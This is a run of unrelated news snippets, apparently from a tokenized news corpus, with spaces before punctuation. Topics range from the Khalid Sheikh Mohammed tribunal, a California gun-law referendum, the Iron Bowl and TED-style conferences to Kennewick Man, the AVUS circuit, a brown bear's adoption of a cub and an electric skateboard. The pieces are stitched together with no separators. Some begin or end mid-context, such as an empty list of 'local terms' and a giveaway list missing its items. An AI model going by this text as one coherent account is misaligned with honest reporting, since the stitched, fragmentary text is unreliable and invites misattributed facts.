He has told friends he and his wife could spend as much as $ 100 million this election to help elect the Republican nominee and support GOP congressional candidates .
Also on the CNN Political Ticker
- McCain says Mourdock endorsement up in the air
- Obama : The 'other guy ' is a 'bulls * * ter '
- Romney beats back on 'horses and bayonets '
- Obama 's Facebook warning
Throwing-the-football-Erickson.jpg
Andrew Buttke catches a pass from his daughter , Carly , as the pair set up their tailgating spot for the Iron Bowl . ( Joel A. Erickson/jerickson @ al.com )
--
Danny Burnette
,
Jerome Crowe
and the rest of their tailgating crew has been making the trip from Childersburg to Auburn 's hayfields for years , and they 've never been worried about getting to their traditional spot .
The familiar Auburn painted school bus takes its normal place in Auburn 's hayfields . ( Joel A. Erickson/jerickson @ al.com )
Not until they saw the line of RVS trailing down South College and hooking onto Donahue on Saturday morning .
Hundreds of RVs swarmed into Auburn on Saturday morning , beginning as early as possible , to secure their spots in the hayfields for next week 's monumental Iron Bowl .
`` It was very concerning this time whether or not we 'd get the same spot , '' Burnette said . `` There were more RVs this morning than I 've seen this early in a long time , if ever . ''
Auburn altered its usual plans to let fans park their RVs a week early , although none can be occupied until 8 a.m. Wednesday .
By the time the hayfields opened at 11 on Saturday , fans from all over the state , including a few wearing crimsons , had turned the roughly six-mile stretch from Exit 51 on I-85 to the hayfields into a massive line .
With so many people flooding into the hayfields , both Burnette and Crowe said the process of parking several hundred RVs on open ground went so smoothly that they found the Auburn personnel in charge and let them know .
But most of the hayfield 's veteran tailgaters knew the rush was coming .
Birmingham 's
Chuck Bush
has been tailgating with a large group of family and friends in the hayfields for roughly a decade , and his group always lands in the same spot , right at the front of the driveway entering the hayfields .
Bush was n't surprised at all at the line that formed Saturday morning .
`` Not for this game , no , '' Bush said with a chuckle . `` And honestly , three or four years ago , it was this way just about every week . Then it kind of died down a little , but it 's picking back up . ''
An Auburn flag flies atop an RV in the Auburn hayfields . ( Joel A. Erickson/jerickson @ al.com )
For Bush and his group , the normal corps of 25 to 30 swells to 50 or 60 for a big game like the one scheduled to take place next Saturday .
That 's what brought
Andrew Buttke
and his family to the hayfield this week , anyway .
Buttke , an Auburn resident who normally parks the RV in the driveway and tailgates near the stadium , has so many friends and family coming in for the Iron Bowl that his tailgate needed more room .
`` This is the first time we actually brought it to the hayfields , '' Buttke said . `` It was originally supposed to open on Wednesday , but ( Auburn ) had a better idea on this Saturday , since we 're off . ''
Nobody who took advantage of the early chance to set up next week 's tailgating spot was really surprised that so many showed up .
This Iron Bowl is shaping up to be as big as it can be .
Hundreds of RVs are already packed into Auburn 's hayfields for next week 's Iron Bowl . ( Joel A. Erickson/jerickson @ al.com )
`` The fact that it 's Alabama , and the fact that we 're way above , I think , what most of us expected in our wildest imaginations -- most of us , thought 6,7,8 wins -- to be where we are , that 's certainly increased interest , '' Bush said . `` Obviously , Alabama not having a big home game this week allowed some of their fans to come down and park . ... It 's going to be a big crowd , and a lot of fun . ''
Move throws case against Khalid Sheikh Mohammed into chaos as defense team says ‘ fatally flawed ' Guantánamo military tribunal should be ended
An explosive allegation about destroyed evidence threatens to unravel the already shaky military tribunal for the alleged architect of the 9/11 terrorist attacks .
Attorneys for Khalid Sheikh Mohammed are calling on the judge and the entire prosecution team in Mohammed 's military commission at Guantánamo Bay to step down from the long-running case over what a member of the defense team called “ at least the appearance of collusion ” that led to the government apparently secretly destroying information relevant to the premier post-9/11 tribunal .
The defense team further argues that the destruction of evidence ought to spell the end of Mohammed 's military trial entirely , a development that would leave the Obama administration and its successor to come up with an entirely new plan for what to do with the top terror suspect in US custody .
“ Now , and indeed over other matters previously , Khalid Sheikh Mohammed 's military commission is fatally flawed , ” said David Nevin , Mohammed 's lead attorney .
The prosecution in the 9/11 military tribunal is seeking the death penalty for the self-described architect of the attacks , who has been in US custody for more than 12 years .
The details of what happened are not known because the unclassified legal filing is not yet publicly available . The specific allegations were filed on Tuesday before the commission , but the filing must clear a routine security review that all such legal documents before the commission undergo .
Marine Corps Maj Derek Poteet , another member of Mohammed 's defense team , said that the move to call for the removal of the judge , Army Col James Pohl , and the prosecution team headed by Army Brig Gen Mark Martins is “ something you do not do lightly ” .
Poteet said : “ I have great respect for Colonel Pohl and Brigadier General Martins , and accordingly I am disappointed , disturbed and sad that we found it necessary to file this motion . ”
Martins , a widely respected officer whose final military service will be presiding over the military commissions , told the Guardian that he would not comment on an issue before the tribunal .
Cmdr Gary Ross , the Pentagon 's spokesman for detentions and military commissions , said “ it would be inappropriate to comment on a document not yet released to the public ” .
Poteet said the rules around discussing classified or protected information limited his ability to describe the case . As he spoke with the Guardian , his defense department-appointed security officer was on the call to advise him about his answers . Nevin also said he was restricted from discussing the matter beyond its vaguest outlines .
But Poteet said that roughly two years ago , the prosecution in the tribunal relayed a request by the US government to destroy evidence relevant to both the guilt phase and the sentencing phase of Mohammed 's trial . Pohl issued an order instructing the government not to destroy the evidence , pending a further order . Attorneys for Mohammed did not take further legal action , as they considered the matter settled .
But around late December 2015 , the defense team received what the lead attorney Nevin called a “ hint from the prosecution that the evidence was no longer available to us ” .
On 10 February , the defense team received a sealed order from Pohl revealing that 20 months earlier , the judge had permitted the government to destroy the evidence .
Poteet said that had the defense team been alerted to Pohl 's reversal of his evidence-destruction order , it would have attempted to stop it .
“ There 's at least the appearance of collusion between the prosecution and the judge . We 're not saying more than that , but there is that appearance , ” Poteet said .
Mohammed has been in US custody since 2003 . CIA operatives waterboarded him 183 times in a single month early in his detention . Earlier attempts at both military tribunals and federal criminal trials for him and his co-defendants have both failed . Congress has passed a law preventing the Pentagon from transferring Guantánamo detainees to the US , for trial or other imprisonment . The second military tribunal of Mohammed and his co-defendants has lasted four years without yet reaching the trial phase .
Nevin and Poteet said that they were ultimately seeking the end of Mohammed 's military commission , even if Pohl recuses himself in favor of a different available military judge and a new prosecution is appointed . “ The effect is there would be no further prosecution , ” Nevin said .
Even if the defense team 's motion fails and Mohammed is ultimately found guilty , Poteet said Mohammed 's attorneys were likely to bring up the evidence destruction issue at sentencing , another indicator of how protracted a legal resolution of the 9/11 attacks has become .
The government must respond to the motion within 14 days . Underscoring the uncertainty of the situation , the next pre-trial hearing in the case is slated for the end of May , but Pohl may not take up the question of whether he should recuse himself and the prosecution from the case , as several other outstanding issues are already on the commission 's agenda .
James Connell , an attorney for Mohammed 's co-defendant Ammar al-Baluchi , said that among the 9/11 defense teams , “ there 's a difference of opinion as to whose fault ” the destruction of evidence is . Connell said he was “ considering my options ” on calling for Pohl 's removal .
“ At the very least , the prosecution team manipulated the system that resulted in the destruction of evidence , ” Connell told the Guardian .
Asked if the evidence destruction had moved the already turbulent 9/11 military tribunal into uncharted territory , Nevin said : “ We 've been in uncharted territory for a long time . And this is another instance of it . ”
San Diego businessman Barry Bahrami has filed papers with the state Attorney General 's office to secure a referendum to repeal the six gun controls in “ Gunmageddon . ”
The new gun controls — which include ammunition background checks , a statewide ban on “ high capacity ” magazines , and an expansion of anti- “ assault weapon ” laws — were signed into law by Governor Jerry Brown ( D ) on July 1. .
According to the Los Angeles Times , Bahrami is “ the CEO of Commercial Network Services. ” In his correspondence with the Attorney General 's office , he wrote “ Veto Gunmageddon , ” and on his Facebook page he wrote , “ Oh no , they passed a new gun control law , I need to go and turn in all my guns— said no criminal ever . ”
The six specific laws being targeted for repeal are :
SB 880 by Sen. Isadore Hall ( D-Compton ) and AB 1135 by Assemblyman Marc Levine ( D-San Rafael ) , which together ban the sale of semiautomatic guns with “ bullet buttons ” allowing easy replacement of the ammunition magazine . –AB 1695 by Assemblyman Rob Bonta ( D-Oakland ) , which makes it a crime to fail to report a gun lost or stolen . — SB 1235 by De León requires those buying ammunition to undergo a background check to make sure they are not a felon . –SB 1446 by Sen. Loni Hancock ( D-Berkeley ) , which outlaws the possession of ammunition magazines that hold more than ten bullets . –AB 1511 by Assemblyman Miguel Santiago ( D-Los Angeles ) , which prohibits short-term loans of firearms to people other than immediate family members .
Bahrami now has 90 days to collect 365,000 signatures to bring a repeal of the laws to a ballot . He plans to accomplish this by using gun stores around the state for signature collection . He said : “ The only certainty is that it 's an impossible challenge if we do n't at least try . By my math we can do it if we hustle . We have more than two thousand gun stores in this state . We will be leveraging these gun stores and numerous volunteers from the communities to get the petitions signed . ”
If he fails to qualify his repeals for the 2016 ballot , he may be able to do so by 2018 .
AWR Hawkins is the Second Amendment columnist for Breitbart News and political analyst for Armed American Radio . Follow him on Twitter : @ AWRHawkins . Reach him directly at awrhawkins @ breitbart.com .
Had any bystanders witnessed the attack on Duncan Davidson late one evening three years ago , they could never have guessed its epochal significance . It was a February night in Long Beach , California , and Davidson was walking to his hotel after a long day of work . West Ocean Boulevard was unusually dark . The streetlights were out . The sidewalks , thickly over-treed , were invisible from the road . As Davidson made his way through the gloom , a man grabbed him from behind and said , I need your badge right fucking now ! 
Dangling from Davidson 's neck was an all-access staff badge for TED , the four-day ideas conference he had been hired to photograph . TED is best known for its eclectic eighteen-minute talks , videos of which often go viral online , and the expensive and clubby annual event where the talks are given . Davidson was also carrying a backpack containing cameras and lenses worth tens of thousands of dollars , but it went ignored . The man squeezed tighter . I do n't want to hurt you , but I will ,  he warned .
Davidson thought quickly . At this hour , it would be difficult to notify everyone that a violent , credentialed TED impostor was at large . The attendees included famous people like Bill Gates , Al Gore , and Meg Ryan . Davidson told the mugger he could n't give him the pass .
No , you do n't understand ,  the man said . I 've got to get in there and meet those people.
I made the decision ,  Davidson recalls , that I do n't have arms , but I have legs. With the guy hanging on his back , Davidson dragged himself toward the street . As they reached the curb , the mugger let go and took off running . From behind , Davidson saw that he was a professional-looking man wearing jeans and a light jacket .
The Long Beach Police Department seemed doubtful of Davidson 's description . The police kept asking ,  Davidson remembers . They did n't want to believe it was a well-kept white guy . They really thought it had to be an itinerant or gang type . It was cognitive dissonance. The attack perplexed Davidson too . This was an attempted identity crime the likes of which the world had never seenthe strong-arm theft of an ideas-conference badgeand he was the first victim . It 's easy to think that money is the currency of the world ,  Davidson says , but there are other currencies.
In January , in Davos , Switzerland , global leadersprime ministers , central bankers , Mick Jaggergathered for the annual World Economic Forum , the planet 's most high-powered schmoozefest . Simultaneously , in Lake Tahoe , 650 twentysomethings and their fellow travelers were hanging out with Questlove and the president of Georgia at Summit Series , an event focused on networking and social entrepreneurship . And this week , in Long Beach , a more tech-savvy crowd will convene for TED 2012 . The high season of the ideas conference is upon us .
At least since the early seventies , when Davos was founded , there have been exclusive gatherings that mix fizzy ideas with major-league networking . The eighties gave rise to Renaissance Weekend , for a largely political crowd ; Allen & Co. 's Sun Valley retreat , for media machers ; and an early version of TED , for the titans of the converging worlds of ( as the organizers had it ) Technology , Entertainment , and Design . But recent years have seen a furious proliferation of these status events . There 's PopTech , FOO Camp , the Clinton Global Initiative , Solve for X ( Google 's conference for moonshot thinking ) . And beyond the ­higher-profile events , a lengthening tail of gatherings you 've never heard of like the Feast , Do Lectures , the 99 % Conference , and Techonomy . All promise much the same thing : a velvet rope to keep out the attitudinally unwashed , serendipitous interaction , quirky content , and at least the illusion of egalitarian elbow-rubbing . They have their own vocabulary , too . These are thought-leader gatherings where rock stars emerge from their silos to learn about disruptive ideas that have been carefully curated.
The appeal is complex . For would-be world-savers enthralled by the power of ideas ,  these conferences are a stand-in for a time when governments did shit , like put people on the moon ,  per one curator . For even die-hard technologists , interacting via disembodied avatars gets old , and occasional 3-D mingling is refreshing . For a certain prosperous tier of the citizenry , the conferences serve as a higher-brow Learning Annex . But most simply , these events are about establishing and reinforcing new hierarchies . In a culture where social rank is ever more fluid , an entrepreneur who overnight goes from sleeping under his desk to IPO-ing into a billionaire needs a way to express his new status , stat . We do n't have castles and noble titles , so how do you indicate you 're part of the elite ?  as Andrew Zolli , PopTech 's executive director , puts it .
Thus the rise of a cohort of speakers and attendees who migrate along the same elite social-intellectual trade routes . Throw in Sundance and SXSW and Burning Man , and you get what Michael Hirschorn has called the clusterfuckoisie ,  tweeting at each other as they shuttle between events . This is so exactly the sort of thing that David Brooks lives to break down into one of his fictive comic-sociological characters that , in his latest book , The Social Animal , he describes Davos parties as rings of interesting and insecure people desperately seeking entry into the realm of the placid and self-satisfied. But Brooks is himself a leading citizen of the realm , having spoken at TED and , regularly , the Aspen Ideas Festival . For public intellectuals with books and brands to promote , the new conferences are force multipliers , unpaid gigs that offer intangible yields . Obviously it 's not the money ,  Brooks says . For me , it 's the chance to get out of my political-pundit circle and meet people I would n't otherwise meet . There are psychic rewards.
JNS.org – Following a Hezbollah threat of retaliation for a purported Israeli airstrike on an arms convoy near the Lebanon-Syria border , Israel has warned the Lebanese government that it will hold them accountable for the actions of Hezbollah .
According to the Lebanese daily al-Akhbar , Israel sent the message through the U.N. peacekeeping force UNIFIL , which patrols southern Lebanon .
“ It is self-evident that we see Lebanon as responsible for any attack on Israel from the territory of Lebanon , ”  Israeli Strategic Affairs Minister Yuval Steinitz said Friday , Israel Radio reported .
“ It is the duty of the Lebanese government to prevent any terrorist attack—whether a terrorist or missile attack , or any other kind—on the State of Israel , ”  he said .
On Wednesday , in an unusually blunt statement , Hezbollah said that it would “ choose the time and place and the proper way to respond ”  against Israel for the airstrike , Lebanon 's Daily Star reported .
Additionally , the Lebanese government said it issued a formal complaint against Israel in the U.N. over the airstrike .
Not only will the accent be familiar , but the Google app 's new voice has place-name pronunciation for Google Maps and local colloquialisms for reminders down pat . It will even reveal the mysterious history of the drop bear .
But how good is the new voice at place names ? Watch for yourself :
As well as making Aussies easier to understand , Google says there are other , more subtle benefits — that ultimately lead to the voice feature being used more often .
`` Australians are more relaxed when they hear a familiar voice , '' said a spokesperson for Google , `` Users are now 30 times more likely to use voice rather than typing requests . ''
Google says mobile voice searches have more than doubled in the past year , and mobile search traffic has surpassed desktop — this is based on global figures .
Here are some local terms you can now use :
Ancient human remains were found by two students on a river bank in Kennewick , Washington in 1996 , leading to the skeleton 's nickname : Kennewick Man . The remains are roughly 9,000 years old , and it is one of the most complete skeletons ever recovered for its age . Kennewick Man is currently housed at the Burke Museum in Washington and access to the remains is controlled by the U.S. Army Corps of Engineers . Preliminary genetic analysis has revealed that he was likely a Native American , but the matter is far from settled .
Determining the ethnicity of Kennewick Man is extremely important , as ownership of the remains has been a fierce legal battle since its discovery . Regional Native American tribes view Kennewick Man as a revered ancestor . If he was , the Native American Graves Protection and Repatriation Act ( NAGPRA ) mandates that the remains be turned over to the tribes for burial . If he was not Native American , as some anthropologists believe due to the skeleton 's age , the remains can be kept , studied , and used for educational purposes .
Anthropologists who disagree with the claim that Kennewick Man is Native American have done so based on the morphology of the skull . The narrow brain casing and prominent forehead are more closely aligned with those living in coastal Asian locations , not Native Americans . However , a 13,000-year-old skeleton recovered in Mexico had a similar skull shape to Kennewick Man , but was found to be genetically related to Native Americans . If Kennewick Man was a Native American , he was one of the oldest in the region .
Genetic analysis of the remains , which would settle the matter absolutely , has been ongoing for several years . Extracting ancient DNA ( aDNA ) for analysis is delicate work , and the field is still relatively young . As samples of bone need to be destroyed in order to extract the DNA , it needs to be scientifically “ worth it ” to test samples .
A research update via email in 2013 from researcher Thomas Stafford Jr. to the U.S. Army Corps of Engineers has indicated that the first samples of aDNA recovered from two small bone fragments suggest that Kennewick Man has “ normal , standard Native-American genetics , ” with “ no indication he has a different origin than North American Native American . ”
However , Stafford went on to say that the bone fragments used for testing were n't ideal and could have been contaminated by environmental factors . Using one of Kennewick Man 's teeth would be ideal , he explained , but it would be several more years until the technology is where it needs to be in order to justify using a tooth . While the preliminary results point to Kennewick being of Native American origin , it is possible that more detailed analysis could refute the findings . It 's not incredibly likely , but it is possible .
Not much more will be known about Kennewick Man 's origins until the researchers publish their results in a peer-reviewed journal . If he is Native American , it will then become a question of which tribe he belongs to . That could prove to be fairly difficult , as the genetic record of Native American tribes is woefully incomplete .
[ Hat tip : Sandi Doughton , The Seattle Times ]
Late Friday , the Obama administration took another step toward following through on its intention to significantly change US detention policy by dropping the Bush administration 's favoured description of the Guantánamo detainees as `` enemy combatants '' . What follows in a filing in US district court , however , is disappointingly similar to the Bush administration 's assertion of detention authority .
Habeas corpus proceedings inherited from his predecessor likely forced Obama to make this filing before his review of detention policy is completed , and this certainly looks like a work in progress rather than a completed product . But even in that reading , the authority articulated today still needs significant improvement to bring it in line with past practice of the US military and America 's obligations under international law .
The Bush administration practically made up the term enemy combatant , as it had no foundation in international law and had almost never appeared in any context prior to 9/11 . It has since become synonymous with the lawlessness of Guantánamo , and the Obama administration 's symbolic move to drop it from description of its detention authority is yet another signal of its desire to put the disastrous Bush detention policies to rest .
The new Obama position differs from the previous administration 's in two other small but important ways . First , it scraps the nefarious interpretation of executive power advocated by Bush lawyers like John Yoo that the president has inherent authority as commander-in-chief to detain virtually anyone , rather relying on Congress ' grant of power contained in the 2001 Authorisation to Use Military Force . Second , it requires that an individual must have `` substantially supported '' the Taliban , al-Qaida or other associated forces in order to be detainable – so the little old lady who donated to a charity only to have it use those funds to support terrorism is now safe .
But other than that , this new detention authority is pretty much the same as the old one . That frustrating reality is likely explained by the timeline of these habeas cases that required the Obama administration to articulate a position on detention authority before its policy reviews had been completed , and , importantly , before it had worked through precisely how and which detainees it intended to transfer out of Guantánamo and where . Attorney general Eric Holder told the court Friday in a separate declaration that the task forces President Obama established to review and develop detention policy will continue to deliberate and will advise the court of any changes in detention policy that would affect the habeas petitioners .
The dilemma the Obama administration faced is that any significant narrowing of the detention authority would likely lead directly to numerous court rulings ordering the immediate release of Guantánamo detainees . The Obama administration clearly intends to work for the transfer or release of a large number of Guantánamo detainees , including many that would be ordered released if the scope of the authority to hold them was narrowed . But it is not realistic to expect them to have worked through all of the real challenges associated with transferring large numbers of Guantánamo detainees in seven weeks when the Bush administration could n't do it in seven years . It 's just not as simple as letting them go .
But buying time only matters if the end result is better than what we have now . The US military had never previously detained as combatants individuals captured outside of a zone of active US combat operations . The Obama administration should return to that practice and limit the military 's detention authority to areas in which the president has ordered the US military to engage the enemy , currently Iraq , Afghanistan and the border regions of Pakistan .
That does not mean the US can not detain suspected terrorists , al-Qaida or otherwise , captured outside those areas , as membership in a designated terrorist organisation is a violation of the criminal law of the US and most likely also of the individual 's native country . It just means that the Obama administration should draw the line between military detainees and those in the criminal justice system around the geographical areas where the US military is engaged in combat .
Some are unsatisfied with the pace and substance of change the Obama administration has brought to detention policy . I think that criticism is premature . The trajectory of its policy is clear and was highlighted by the announcement in its first week in office the major initiatives to close Guantánamo , renounce torture and stop extraordinary rendition .
When objections have been raised – on the state secrets privilege , judicial oversight of Bagram or even this action – in each instance , the Obama administration was forced to make filings in court proceedings it inherited from the Bush administration on a timeline out of its control . Advocates for a better US detention policy must continue to push hard , but we must also recognise just how difficult it is to responsibly unwind the complete mess created by the Bush administration .
It took just twenty minutes for a grand jury to return a verdict Wednesday that the shooting of 16-year-old Victor Villalpando by an Espanola police officer June 8 was justified.Wednesday , the district attorney released surveillance video of the moment police say Villalpando pulled a cap gun on them , and also released audio recordings from a surveillance camera of the 911 call that served as the impetus of the shooting . `` Yes , [ I 'm ] over here at Lovin ' Oven , and there 's some crazy kid out here and I do n't know what he 's doing , '' the tape captures Villalpando telling dispatchers . Investigators say the `` crazy kid '' was actually Villalpando himself . `` It looks like he has a gun in his hand , '' he says . `` He just said he wanted to die . But…I do n't know . `` Moments later , officers arrived at the scene and talked to Villalpando , which is when they say he reached behind him and pulled out what they say looked like a real gun . `` He just pulled it , '' District Attorney Angela `` Spence '' Pacheco told the courtroom Wednesday . `` And as soon as they saw the gun…they 're trained to fire . At that point in time , they had no idea it was n't a real gun . `` Pacheco showed the media photos of the gun at a news conference in Santa Fe Wednesday . It looked real , but turned out to be a toy cap gun.But she also said Wednesday that Villalpando did pull a real knife on officers after he was shot . `` Is it suicide by cop ? '' Pacheco responded Wednesday to a question from KOB , `` I 'll let you make your own inferences from everything that has occurred . `` Investigators said Villalpando called 911 on himself twice before the June 8 shooting , and friends testified he seemed upset about a girl and did n't want to live if he could n't marry her . `` He texts messaged a good friend of his on [ June } 5th and said , 'watch the news , something big is going to happen . Watch for me on the news . ' '' Pacheco said Wednesday the teen 's family does n't agree with the grand jury 's decision . `` They feel that the police officers should have better training to deal with individuals who have mental health issues , '' she said.Friends say Villalpando was a dancer who had been accepted to attend the New Mexico School for the Arts this fall .
Vorsteiner have revealed their new Gallardo Renazzo which is based as the name says , on the Lamborghini Gallardo .
The complete front fascia solution is a direct replacement for the OEM piece , and features 2×2 carbon composite pre-preg construction with unique floating dual aero fins and a honey comb mesh grill set . Also available are an optional 2×2 carbon fiber center splitter add-on piece and optional optical 2×2 carbon fiber dual fins for additional stability .
The Vorsteiner Renazzo design is derived in part from the Gallardo Super Trofeo race car that competes in the Lamborghini Blancpain Super Trofeo cup , and will bring those styling cues to the Gallardo sports car for the street . additional aerodynamic solutions in the Renazzo line will be released shortly , ensuring a complete visual cohesion . Also featured are the Vorsteiner Special Edition Forged VSE-001 one-piece wheel , available in a wide variety of finishes and fitments .
SUNNYVALE , Calif. , September 22 , 2017 – Socionext Inc. , Linaro and GIGABYTE have jointly built a software development environment that complies with Linaro 's 96Boards open hardware specification . Under the collaboration , GIGABYTE manufactures the 96Boards-compliant hardware with Socionext 's SC2A11 processor , and Linaro provides support through its 96Boards community . The companies expect the new development environment to help the expansion of ARM®-based software in a broad range of applications including IoT gateway , edge computing and servers . The environment will become available to customers starting December 2017 .
The rapid growth of IoT ( Internet of Things ) has led to an increasing demand for processing large amounts of data at high speed , in each phase , from data collection at gateways to edge computing to large-scale cloud servers in data centers . With these applications , the ARM architecture becomes a promising option for improving energy efficiency and reducing costs . In order to address these requirements , Linaro , GIGABYTE and Socionext have built an environment with a power-efficient processor that enables easy development of highly-versatile software using the ARM-native instruction set .
Socionext 's SynQuacer SC2A11 integrates 24 cores of ARM Cortex-A53 , the 64-bit , v8-based low power core , in a single chip . The processor has been optimized to handle tasks whose throughput is critical , though each of the individual tasks being relatively small-loaded . The chip consumes only 5W of power , thanks to its optimal low-power design . In addition , ARM TrustZone with extended feature is implemented into SynQuacer SC2A11 , and the processor can be used for applications such as IoT gateways , where reliability and robustness are essential . With the SC2A11 built onto the 96Boards Enterprise-compliant standard hardware , customers can make full use of software from Linaro and use extension boards provided by the partners , to easily develop highly versatile software .
AVUS or Automobil-Verkehrs-und Übungsstrasse , is a public road in the city of Berlin that was opened in 1921 and it was used as a racing circuit until 1998 .
Track with a length of 19 km
It was probably the most unusual racing track in the world and it was so simple , with only two long straights and two hairpin corners at each end . The original length of the track was 19 km , but over the years , it was shortened several times after moving the southern turn – from 8.3 km to the length of 2.6 km .
The building of the AVUS started in 1907 after Kaiserlicher Automobilclub devised the construction of a circuit which could be used as a racing track and also as a testing track for the expanding motor industry . It was finished 14 years later and hosted the first post-war International Automobile Exhibition with a motor race .
‘ Green Hell ' was safer than AVUS
Five years later , AVUS for the first time was the host of the International German Grand Prix for sports cars . That was a good idea with a bad outcome as the safety measures were n't good enough for racing and four people lost their lives during training and race . From 1927 onwards , the German Grand Prix was moved to the safer Nurburgring circuit .
AVUS was suitable for Olympic events
The last race was held in 1935 as AVUS became too dangerous for cars averaging at a speed of 200 km/h , but the circuit was used during the Berlin Olympic Games in 1936 for the cycling and athletic events . The north curve of the circuit was then turned into a steeply banked curve of 43 degrees , made of bricks , so cars that missed the turn easily flew off it . In 1967 , the banked curve was removed due to safety reasons and was replaced with the flat version .
Video – 1937 AVUS Grand Prix
Fangio also drove at AVUS
After WW2 , AVUS hosted the first race in 1951 , for Formula 2 and Formula 3 championships . The track was shortened and was very close to the well-known Berlin Wall . In 1954 , Formula 1 race was also held at AVUS , but it was a non-championship event . Despite that , legendary Juan Manuel Fangio participated in the race . Five years later , AVUS hosted the only Formula 1 German Grand Prix and the winner was Tony Brooks .
As time went on , and security criteria became more stringent , AVUS became less interesting for the racing championships . Racing on the straight circuits became less popular in the 1980s and 1990s . The track length was cut roughly due to safety reasons , but that was n't enough for the revival , even after a couple of Formula 3 and DTM races were held there .
The track was closed in 1998
Despite safety measures , still a lot of accidents and incidents took place at AVUS , some of them with fatal outcomes , spelling the end for this unusual venue . The last competitive race was held in 1998 and in the following year , the racing veterans event was the farewell of this historic venue .
The famous round race control tower at the north end is still there , used as a motel and a restaurant while the large wooden grandstand is protected as a historic monument .
Photo : smartage.com wikipedia.org themotorsportarchive.com
Unlikely Act of Love in Katmai National Park Derek Ward
Holly , a brown bear in Katmai National Park and Preserve has opened her paws and taken in a new cub , which was abandoned earlier this summer by his own mother . Adopting another cub is incredibly rare among brown bears , says NPR .
The cub waited in a tree for his mother while she spent a week courting and mating with aggressive males at Katmai 's Brooks Falls . Unfortunately , the mother never returned for her cub , and the yearling was left to fend for himself . Luckily , the cub was able to persevere on his own until help arrived .
To the surprise of Roy Wood , a park ranger at Katmai , Holly adopted the cub even though she already had a nine-month old cub of her own . Within a month , Wood reports that Holly and the cub were seen sharing fish and even nursing . The ranger suspects that Holly will even share her den with the cub this upcoming winter .
While the extra cub has required Holly to catch more fish , produce more milk and even protect against other bears , Wood suspects that adopting the cub may actually be providing Holly with some benefits . Along with providing her den with some extra body heat during the winter , the cub has an extra pair of eyes to watch for approaching danger .
The unusual affair was a pleasure for both park rangers and park visitors to watch . Wood described the event as , “ an incredibly special thing that we 've been able to witness in the wild . ”
Want to have close encounters with these brown bears in Katmai National Park ? Join us on our trip to see these mighty animals on Alaska 's Coastal Grizzlies : Kodiak to Katmai !
ShipComrade 's 1 Year Anniversary EU Giveaway
Critter8 Published By :
So our 1 Year Anniversary is approaching . and to celebrate , we are gon na be giving away some rare Ships . Last week we gave all of the NA captains a chance , but now it 's the turn of the EU World of Warships fan base !
On Saturday July 2nd , we will be joining forces with our good friend and supporter Crysantos . Thanks to the good folks over at EU Wargaming . Our EU supporters will have a rare chance at some Ships currently not available to purchase , and one you may never see again as Wargaming has announced they may never sell again due to it being way too OP . Again , we would like to thank everyone for the support over the last year & we look forward to the next .
What are we giving away , you ask ?
2 x 2 x
3000 Doubloons + 2 packages of3000 Doubloons
If we can get the following Tweet to 50 Retweets , We will also be giving away a Nikolai
1 x
* all 5 rare ships are not available for purchase .
( sorry NA , Ships are EU Only ! NA already had their event on June 21st )
When : Saturday July 2nd , 7-10pm CEST 1-4 pm EST
* giveaways happening every 30 minutes
DR. ACULA Has Broken Up
Tags :
Dr. Acula , Victory Records
Jason Fisher October 25 , 2012
October 25 , 2012
Victory Records recording artists , Dr. Acula , is no longer a band . Earlier this evening , bassist Oli Miclette took to the band 's facebook page and made the RIP announcement . Moments later , the post was removed and in it 's place , it was claimed `` I think our page just got hacked .. '' Oli Miclett : `` It 's time for us to move on to new stuff . This band was n't going in a direction that pleased everyone in DA . Some members kept cancelling tours for no valid reasons , without respect for the fans . With the departure of Bill and the cancellation of our European tour , Casey and I decided to part ways with the rest of the band to concentrate on a new band with a good friend of mine , Blake Moore . We will announce the band and release stuff in January 2013. '' Dr . Acula is still planning on performing at Soundwave in February , 2013.Two weeks ago , founding guitarist Bill Graffeo left the band causing them to cancel all U.S. tour dates.We will post more news as it becomes available .
This mysterious website is trying to reach out to those who have seen a peculiar looking man in their dreams . The site claims thousands of people around the world have seen the same creepy man with thick eyebrows and thinning hair in their subconscious . As sinister as the guy looks , he never seems to do anything nefarious to the dreamer . In fact , most people say that he is a calming presence within the dream .
Have you dreamed this man ?
In 2006 , a young woman in New York had her psychiatrist draw a recurring face she was seeing in her dreams . She said the man would sometimes give her friendly life advice , but only in her dreams . She never met the man before in her life .
The psychiatrist left the drawing on his desk , and another patient of his recognized the face of the subject . He said that he also often receives twilight advice from `` this man '' in his dreams .
The psychiatrist shows the drawing to his colleagues and has them ask their patients if they had ever seen the face . Four patients admitted to having seen him frequently in their dreams , all of them referring to him as `` this man . ''
Since then , over 2000 people have claimed to have seen `` this man '' from countries all over the world . This picture is from La Habana , Cuba .
We tried the board out in our offices first . Baby steps . After all , as anyone who 's ever ridden board on the island of Manhattan can tell you , the experience is a bit like 720° crossed with Paperboy . We flinched a bit at the concept of riding the thing on the linoleum floors of our building -- generally , skateboards and glossy floors do n't really mix , but Larson and fellow co-creator Ben Forman assured us that the ZBoard is an all-terrain vehicle , thanks to its big , treaded wheels . Sure enough , the board rode just fine on linoleum and took on the indoor carpeting with ease .
There 's still a bit of a learning curve here , even for experienced skaters . The board has two black , circular pads on top of the deck . The front is for accelerating while the rear is for decelerating and stopping . The more you lean your weight into the front , the faster you go . There 's also a bit of a dead man 's brake functionality at work here , stopping the board when you remove your foot from the front . The team is working to improve that , however , so riders do n't have to keep their foot on the front pad at all times if they want to coast along . We had a bit of trouble adjusting out feet during riding , but you get the hang of that pretty quickly . The most difficult part of learning the board is turning . It 's a big board , and thanks to the motor on the bottom of the deck , the weight is distributed differently -- we found ourselves taking much wider turns to make our way around corners .
After 30 seconds on the thing indoors , we naturally figured it was time to go cruising through the park at the beginning of a crowded spring holiday weekend . We watched Forman and Larson take the board out first -- it 's amazing what a little practice does . We had a little more trouble on our first run outside , but managed to weave around park-goers without crashing into any -- even if our turns were quite a bit wider than theirs . Thanks in part to carved-out wheel wells on the bottom and back lip ( both new additions to the form factor that we first saw back at CES ) , reasonably tight turns are possible here . At a top speed of 17 mph , the thing is also pretty zippy for a skateboard -- we would n't recommend trying to reach the top speed the first time out , as it 's a bit tough to master the braking situation . Instinctually , we found ourselves taking our feet off the board when it was time to brake -- though Forman tipped us to keep our feet on for maximum ZBoard style points .
Other improvements to the board , since the last time we saw it , include improved electric performance , a new maple deck with a new shape ( all US-sourced ) and a leather grip handle -- handy , given the size and weight of the board . The team managed to sell 350 boards with its Kickstarter company , as well . Pricing for the boards starts at $ 500 . The pro-model we got to play with will run you $ 750 ( all plus $ 50 shipping , domestically ) . The boards will start shipping this summer .
Zach Honig contributed to this report
